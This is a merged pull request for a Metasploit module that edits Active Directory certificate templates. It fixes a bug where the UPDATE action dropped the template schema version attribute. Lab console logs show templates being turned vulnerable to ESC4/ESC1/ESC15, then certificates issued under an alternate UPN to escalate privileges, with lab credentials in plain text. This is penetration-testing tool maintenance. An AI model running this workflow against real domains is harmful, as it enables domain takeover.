
Fix UPDATE certificate templates with admin/ldap/ad_cs_cert_template #19572

Merged

Conversation

cdelafuente-r7
Contributor

This change introduced an issue with the admin/ldap/ad_cs_cert_template module when using the UPDATE action and the default templates. Removing the msPKI-Template-Schema-Version from the IGNORED_ATTRIBUTES array will result in deleting the attribute on the remote server. This is due to the fact that the default certificates templates used by the module don't include this attribute.

To fix this, I just added the msPKI-Template-Schema-Version attribute to certificate templates and set it to version 2.

Verify

Please follow the steps in the Exploiting ESC4 To Gain Domain Administrator Privileges section of the docs.

The installation procedure for ESC4 is in the following PR.

Before the fix (using the default ESC1 template)

```
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run verbose=true RHOSTS=10.232.98.2 username=msfuser password=123456 domain=my.domain.local CERT_TEMPLATE=ESC4
[*] Running module against 10.232.98.2

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=ESC4,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=my,DC=domain,DC=local
[*] Certificate template data written to: /home/n00tmeg/.msf4/loot/20241018192601_default_10.232.98.2_windows.ad.cs.te_705926.json
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > previous
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/dcerpc/icpr_cert) > run verbose=true CA=mspro-dc-ad-pro-local-CA RHOSTS=10.232.98.2 username=msfuser password=123456 CERT_TEMPLATE=ESC4 [email protected]
[*] Running module against 10.232.98.2

[*] 10.232.98.2:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.232.98.2:445 - Binding to \cert...
[+] 10.232.98.2:445 - Bound to \cert
[*] 10.232.98.2:445 - Requesting a certificate for user msfuser - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC4
[-] 10.232.98.2:445 - There was an error while requesting the certificate.
[-] 10.232.98.2:445 - Denied by Policy Module  0x80094800, The request was for a certificate template that is not supported by the Active Directory Certificate Services policy: ESC4.
[-] 10.232.98.2:445 - Error details:
[-] 10.232.98.2:445 -   Source:  (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
[-] 10.232.98.2:445 -   HRESULT: (0x80094800) CERTSRV_E_UNSUPPORTED_CERT_TYPE: The requested certificate template is not supported by this CA.
[*] Auxiliary module execution completed
```

After the fix (using the default ESC1 template)

```
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run verbose=true RHOSTS=10.232.98.2 username=msfuser password=123456 domain=my.domain.local CERT_TEMPLATE=ESC4
[*] Running module against 10.232.98.2

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=ESC4,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=my,DC=domain,DC=local
[*] Certificate template data written to: /home/n00tmeg/.msf4/loot/20241018192215_default_10.232.98.2_windows.ad.cs.te_706739.json
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > use admin/dcerpc/icpr_cert
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/dcerpc/icpr_cert) > run verbose=true CA=mspro-dc-ad-pro-local-CA RHOSTS=10.232.98.2 username=msfuser password=123456 CERT_TEMPLATE=ESC4 [email protected]
[*] Running module against 10.232.98.2

[*] 10.232.98.2:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.232.98.2:445 - Binding to \cert...
[+] 10.232.98.2:445 - Bound to \cert
[*] 10.232.98.2:445 - Requesting a certificate for user msfuser - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC4
[+] 10.232.98.2:445 - The requested certificate was issued.
[*] 10.232.98.2:445 - Certificate UPN: [email protected]
[*] 10.232.98.2:445 - Certificate stored at: /home/n00tmeg/.msf4/loot/20241018192242_default_10.232.98.2_windows.ad.cs_492337.pfx
[*] Auxiliary module execution completed
```

Note that I tested with the other default templates (ESC2 and ESC3) and they still work as expected.
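As an added illustration of the failure the description reports (this is not code from the module or from this PR), the following models the UPDATE planning step as the description explains it: the remote object's attributes are compared with the local template, attributes the template defines are replaced, attributes the template lacks are deleted, and anything on an ignore list is left alone. The `plan_update`, `deleted_attributes` and `ignored?` helpers, both ignore lists and the sample attribute values are constructed for this example; the real contents of the module's `IGNORED_ATTRIBUTES` array and the exact shape of its modify calls are assumptions.

```ruby
# Added illustration, not the ad_cs_cert_template module's own code: models how an
# UPDATE that syncs a remote template object to a local template definition ends up
# deleting any attribute the local definition omits, unless that attribute is on the
# ignore list. Helper names, ignore lists and sample data below are constructed.

# Attributes the planner must never touch (hypothetical list modelled on the
# module's IGNORED_ATTRIBUTES array; the real array's contents are assumed).
IGNORED_WITH_SCHEMA_VERSION = %w[
  distinguishedName objectGUID objectClass cn name
  msPKI-Template-Schema-Version
].freeze

# The same list with the schema version removed, which is the change that broke UPDATE.
IGNORED_WITHOUT_SCHEMA_VERSION =
  (IGNORED_WITH_SCHEMA_VERSION - ['msPKI-Template-Schema-Version']).freeze

# Constructed sample of what a READ returns for an existing template (trimmed to a
# few attributes); note that it carries msPKI-Template-Schema-Version.
REMOTE_OBJECT = {
  'distinguishedName' => ['CN=ESC4,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=my,DC=domain,DC=local'],
  'objectGUID' => ['00000000-0000-0000-0000-000000000000'],
  'msPKI-Certificate-Name-Flag' => ['1'],
  'msPKI-Enrollment-Flag' => ['0'],
  'msPKI-Template-Schema-Version' => ['1'],
  'pKIMaxIssuingDepth' => ['-1']
}.freeze

# Constructed local template definition that, like the default templates the PR
# description refers to, does not carry msPKI-Template-Schema-Version.
LOCAL_TEMPLATE = {
  'msPKI-Certificate-Name-Flag' => ['1'],
  'msPKI-Enrollment-Flag' => ['0'],
  'msPKI-Private-Key-Flag' => ['16'],
  'pKIMaxIssuingDepth' => ['-1']
}.freeze

# LDAP attribute names are case-insensitive, so compare them that way.
def ignored?(attr, ignored)
  ignored.any? { |name| name.casecmp?(attr) }
end

# Plan the LDAP modify operations that make the remote object match the local
# template: replace every attribute the template defines and delete every remote
# attribute the template lacks, skipping the ignore list in both directions.
# Returns an array of [op, attribute, values] triples.
def plan_update(remote, template, ignored)
  ops = []
  template.each do |attr, values|
    next if ignored?(attr, ignored)
    ops << [:replace, attr, Array(values)]
  end
  remote.each_key do |attr|
    next if ignored?(attr, ignored)
    next if template.keys.any? { |t| t.casecmp?(attr) }
    ops << [:delete, attr, nil]
  end
  ops
end

# Names of the attributes a plan would remove from the remote object.
def deleted_attributes(ops)
  ops.select { |op, _attr, _values| op == :delete }.map { |_op, attr, _values| attr }
end

if __FILE__ == $PROGRAM_NAME
  [['schema version ignored', IGNORED_WITH_SCHEMA_VERSION],
   ['schema version not ignored', IGNORED_WITHOUT_SCHEMA_VERSION]].each do |label, ignored|
    ops = plan_update(REMOTE_OBJECT, LOCAL_TEMPLATE, ignored)
    puts "#{label}: deletes #{deleted_attributes(ops).inspect}"
  end
end
```

Run as a script it reports an empty delete list while the schema version is on the ignore list and `["msPKI-Template-Schema-Version"]` once it is taken off, which is the attribute loss the description reports and is consistent with the `CERTSRV_E_UNSUPPORTED_CERT_TYPE` rejection in the "before the fix" output above. The practical check for anyone auditing such a sync tool is the same: any attribute the server sets itself and the local definition does not carry must either be ignored or be read back from the object before the modify is built.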

@cdelafuente-r7 cdelafuente-r7 added the rn-fix release notes fix label Oct 18, 2024
@smcintyre-r7 smcintyre-r7 self-assigned this Oct 18, 2024
Contributor

@smcintyre-r7 smcintyre-r7 left a comment


It looks like when msPKI-Template-Schema-Version is included in an UPDATE operation, the template becomes unusable. When msPKI-Template-Schema-Version is included in a CREATE operation and the value is 1 or 2, the template is created with a schema version of 1. I did not test other schema version values.

I think what we might actually want to do is:

  • revert the change that removed msPKI-Template-Schema-Version from the IGNORED_ATTRIBUTES array
  • remove the schema version from all of the templates (since they're created as version 1 anyways)
  • add the current version to the output of the READ operation (see the patch below)

Also if you don't mind, could you update the spots I missed to note the ESC15 support?

diff --git a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
index 0044830ecb..bfd67a8c8c 100644
--- a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
+++ b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
@@ -428,6 +428,11 @@ class MetasploitModule < Msf::Auxiliary
       print_status("  msPKI-RA-Signature: 0x#{pki_flag.to_s(16).rjust(8, '0')}")
     end
 
+    pki_flag = obj['mkpki-template-schema-version']&.first
+    if pki_flag.present?
+      print_status("  msPKI-Template-Schema-Version: #{pki_flag}")
+    end
+
     if obj['mspki-certificate-policy'].present?
       if obj['mspki-certificate-policy'].length == 1
         if (oid_name = get_pki_oid_displayname(obj['mspki-certificate-policy'].first)).present?
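Review bot: the attribute key on the first added line is misspelled: `obj['mkpki-template-schema-version']` should be `obj['mspki-template-schema-version']`, matching the `mspki-` prefix of the other lookups in this method such as `obj['mspki-certificate-policy']` on the context line just below; as written the key never matches, `pki_flag` stays nil and the new `print_status` line is never reached. Since the value is a plain version number rather than a flag bitmask, naming it `schema_version` instead of reusing `pki_flag` would also make the block read more clearly.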

@cdelafuente-r7
Contributor Author

Thanks @smcintyre-r7, I've made these changes in the latest commit.

Contributor

@smcintyre-r7 smcintyre-r7 left a comment


Alright I ran through this using the templates to both create and update the existing template to be vulnerable to ESC15 to see that it's working.

<details>
<summary>Testing Output</summary>

```
metasploit-framework.pr (S:0 J:0) > show options

Global Options:

   Option             Current Setting                      Description
   ------             ---------------                      -----------
   ConsoleLogging     false                                Log all console input and output
   LogLevel           3                                    Verbosity of logs (default 0, max 3)
   MeterpreterPrompt  meterpreter                          The meterpreter prompt string
   MinimumRank        0                                    The minimum rank of exploits that will run without explicit confirmation
   Prompt             metasploit-framework.pr (S:%S J:%J)  The prompt string
   PromptChar         >                                    The prompt character
   PromptTimeFormat   %H:%M:%S                             Format for timestamp escapes in prompts
   SessionLogging     false                                Log all input and output for sessions
   SessionTlvLogging  false                                Log all incoming and outgoing TLV packets
   TimestampOutput    false                                Prefix all console output with a timestamp

metasploit-framework.pr (S:0 J:0) > fzuse
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > show options

Module options (auxiliary/admin/ldap/ad_cs_cert_template):

   Name           Current Setting                                                                                                      Required  Description
   ----           ---------------                                                                                                      --------  -----------
   BASE_DN                                                                                                                             no        LDAP base DN if you already have it
   CERT_TEMPLATE  PR-19572                                                                                                             yes       The remote certificate template name
   SSL            false                                                                                                                no        Enable SSL on the LDAP connection
   TEMPLATE_FILE  /home/smcintyre/Repositories/metasploit-framework/data/auxiliary/admin/ldap/ad_cs_cert_template/esc1_template.yaml  no        Local template definition file

   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on

   Used when making a new connection via RHOSTS:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN    msflab.local     no        The domain to authenticate to
   PASSWORD  Password1!       no        The password to authenticate with
   RHOSTS    192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     389              no        The target port
   USERNAME  smcintyre        no        The username to authenticate with

Auxiliary action:

   Name  Description
   ----  -----------
   READ  Read the certificate template

View the full module info with the info, or info -d command.

metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145221_default_192.168.159.10_windows.ad.cs.te_964934.json
[*] Certificate Template:
[*]   distinguishedName: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*]   displayName: PR-19572
[*]   objectGUID: f0f65d97-d4d4-4e3c-822f-09ca617945c5
[*]   msPKI-Certificate-Name-Flag: 0x00000001
[*]     * CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
[*]   msPKI-Enrollment-Flag: 0x00000000
[*]   msPKI-Private-Key-Flag: 0x00000010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   pKIKeyUsage: 0x00000000
[*]   pKIMaxIssuingDepth: -1
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > delete
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145226_default_192.168.159.10_windows.ad.cs.te_917580.json
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[-] Auxiliary aborted due to failure: not-found: The specified template was not found.
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > create
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[*] Creating: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145233_default_192.168.159.10_windows.ad.cs.te_420036.json
[*] Certificate Template:
[*]   distinguishedName: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*]   displayName: PR-19572
[*]   objectGUID: 11b06edf-201e-4ade-8130-759c0a4f0f27
[*]   msPKI-Certificate-Name-Flag: 0x00000001
[*]     * CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
[*]   msPKI-Enrollment-Flag: 0x00000000
[*]   msPKI-Private-Key-Flag: 0x00000010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   msPKI-Template-Schema-Version: 1
[*]   pKIKeyUsage: 0x00000000
[*]   pKIMaxIssuingDepth: -1
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > use icpr_cert

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/admin/dcerpc/icpr_cert  .                normal  No     ICPR Certificate Management
   1    \_ AKA: Certifry                .                .       .      .
   2    \_ AKA: Certipy                 .                .       .      .

Interact with a module by name or index. For example info 2, use 2 or use auxiliary/admin/dcerpc/icpr_cert

[*] Using auxiliary/admin/dcerpc/icpr_cert
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > show options

Module options (auxiliary/admin/dcerpc/icpr_cert):

   Name                 Current Setting    Required  Description
   ----                 ---------------    --------  -----------
   ADD_CERT_APP_POLICY  1.3.6.1.5.2.3.4    no        Add certificate application policy OIDs
   ALT_DNS                                 no        Alternative certificate DNS
   ALT_SID                                 no        Alternative object SID
   ALT_UPN              [email protected]  no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                   msflab-DC-CA       yes       The target certificate authority
   CERT_TEMPLATE        ESC15-Test         yes       The certificate template
   ON_BEHALF_OF                            no        Username to request on behalf of (format: DOMAIN\USER)
   PFX                                     no        Certificate to request on behalf of

   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on

   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as

Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate

View the full module info with the info, or info -d command.

metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE PR-19572
CERT_TEMPLATE => PR-19572
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > unset ADD_CERT_APP_POLICY
Unsetting ADD_CERT_APP_POLICY...
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > show options

Module options (auxiliary/admin/dcerpc/icpr_cert):

   Name                 Current Setting    Required  Description
   ----                 ---------------    --------  -----------
   ADD_CERT_APP_POLICY                     no        Add certificate application policy OIDs
   ALT_DNS                                 no        Alternative certificate DNS
   ALT_SID                                 no        Alternative object SID
   ALT_UPN              [email protected]  no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                   msflab-DC-CA       yes       The target certificate authority
   CERT_TEMPLATE        PR-19572           yes       The certificate template
   ON_BEHALF_OF                            no        Username to request on behalf of (format: DOMAIN\USER)
   PFX                                     no        Certificate to request on behalf of

   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on

   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as

Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate

View the full module info with the info, or info -d command.

metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: PR-19572
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: [email protected]
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241022145314_default_192.168.159.10_windows.ad.cs_866614.pfx
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > previous
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > update
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022150133_default_192.168.159.10_windows.ad.cs.te_142919.json
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > update
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022150134_default_192.168.159.10_windows.ad.cs.te_145328.json
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > previous
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: PR-19572
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: [email protected]
[*] 192.168.159.10:445 - Certificate Policies:
[*] 192.168.159.10:445 -   * 1.3.6.1.5.2.3.4
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241022150140_default_192.168.159.10_windows.ad.cs_878467.pfx
[*] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) >
```

</details>

@smcintyre-r7 smcintyre-r7 merged commit 05a149d into rapid7:master Oct 22, 2024
39 checks passed